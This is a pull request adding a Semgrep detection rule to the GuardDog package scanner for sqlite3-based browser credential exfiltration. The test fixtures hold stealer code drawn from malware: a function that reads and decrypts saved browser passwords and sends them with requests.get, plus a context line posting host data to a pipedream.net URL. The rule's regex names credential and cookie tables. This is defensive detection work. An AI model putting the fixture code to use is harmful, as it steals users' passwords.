### PR TITLE
Add detection for Python sqlite3 data exfiltration

### DIFF
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -37,13 +37,12 @@ rules:
               ...
               $CURSOR = $CONNECT.cursor(...)
               ...
-              $CURSOR.close(...)
           - pattern: $CURSOR.execute($QUERY, ...)
           - metavariable-pattern:
               metavariable: $QUERY
               patterns:
                 - pattern: "..."
-                - pattern-regex: (?i)select\s+[card_number_encrypted|encrypted_value|isHttpOnly|name|origin_url|password_value|username].*\s+from\s+[cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins]
+                - pattern-regex: (?i)select\s+\S+.*\s+from\s+(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
     pattern-sinks:
       - pattern-either:
           - pattern-inside: requests.$METHOD(...)
@@ -55,7 +54,6 @@ rules:
               - pattern-inside: $S = socket.socket(...); ...
               - pattern-inside: $S.connect(...); ...
               - pattern-inside: $S.send(...)
-          - pattern-inside: $F.write(...)
     languages:
       - python
     severity: WARNING

--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -42,7 +42,7 @@ rules:
               metavariable: $QUERY
               patterns:
                 - pattern: "..."
-                - pattern-regex: (?i)select\s+\S+.*\s+from\s+(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
+                - pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
     pattern-sinks:
       - pattern-either:
           - pattern-inside: requests.$METHOD(...)

--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -31,6 +31,19 @@ rules:
           - metavariable-regex:
               metavariable: $ENVVAR
               regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\'])
+      - patterns:
+          - pattern-inside: |
+              $CONNECT = sqlite3.connect(...)
+              ...
+              $CURSOR = $CONNECT.cursor(...)
+              ...
+              $CURSOR.close(...)
+          - pattern: $CURSOR.execute($QUERY, ...)
+          - metavariable-pattern:
+              metavariable: $QUERY
+              patterns:
+                - pattern: "..."
+                - pattern-regex: (?i)select\s+[card_number_encrypted|encrypted_value|isHttpOnly|name|origin_url|password_value|username].*\s+from\s+[cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins]
     pattern-sinks:
       - pattern-either:
           - pattern-inside: requests.$METHOD(...)
@@ -42,6 +55,7 @@ rules:
               - pattern-inside: $S = socket.socket(...); ...
               - pattern-inside: $S.connect(...); ...
               - pattern-inside: $S.send(...)
+          - pattern-inside: $F.write(...)
     languages:
       - python
     severity: WARNING

--- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
+++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
@@ -244,7 +244,8 @@ def steal_passwords2(self, name: str, path: str, profile: str):
             url, username, password = res
             password = self.dcrpt_val(password, self.masterkey)
             if url != "":
+                params = {'url': url, 'username': username, 'password': password}
                 # ruleid: exfiltrate-sensitive-data
-                f.write(f"URL: {url}\nID: {username}\nPASSWORD: {password} \n\n")
+                requests.get("https://example.com", params=params)
     cursor.close()
     conn.close()

--- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
+++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
@@ -226,3 +226,25 @@ class CustomInstall(install):
         ploads = {'hostname':hostname,'cwd':cwd,'username':username}
         # ruleid: exfiltrate-sensitive-data
         requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads)
+
+
+""" RULEID: sqlite3 data exfiltration
+"""
+
+def steal_passwords2(self, name: str, path: str, profile: str):
+    path = "path"
+    if not os.path.isfile(path):
+        return
+    loginvault = self.random_dir_create()
+    copy2(path, loginvault)
+    conn = sqlite3.connect(loginvault)
+    cursor = conn.cursor()
+    with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f:
+        for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall():
+            url, username, password = res
+            password = self.dcrpt_val(password, self.masterkey)
+            if url != "":
+                # ruleid: exfiltrate-sensitive-data
+                f.write(f"URL: {url}\nID: {username}\nPASSWORD: {password} \n\n")
+    cursor.close()
+    conn.close()


### PR DESCRIPTION
This PR extends the `exfiltrate-sensitive-data` rule with a detection for data exfiltration using `sqlite3`, based on samples observed in the wild.

Closes #232 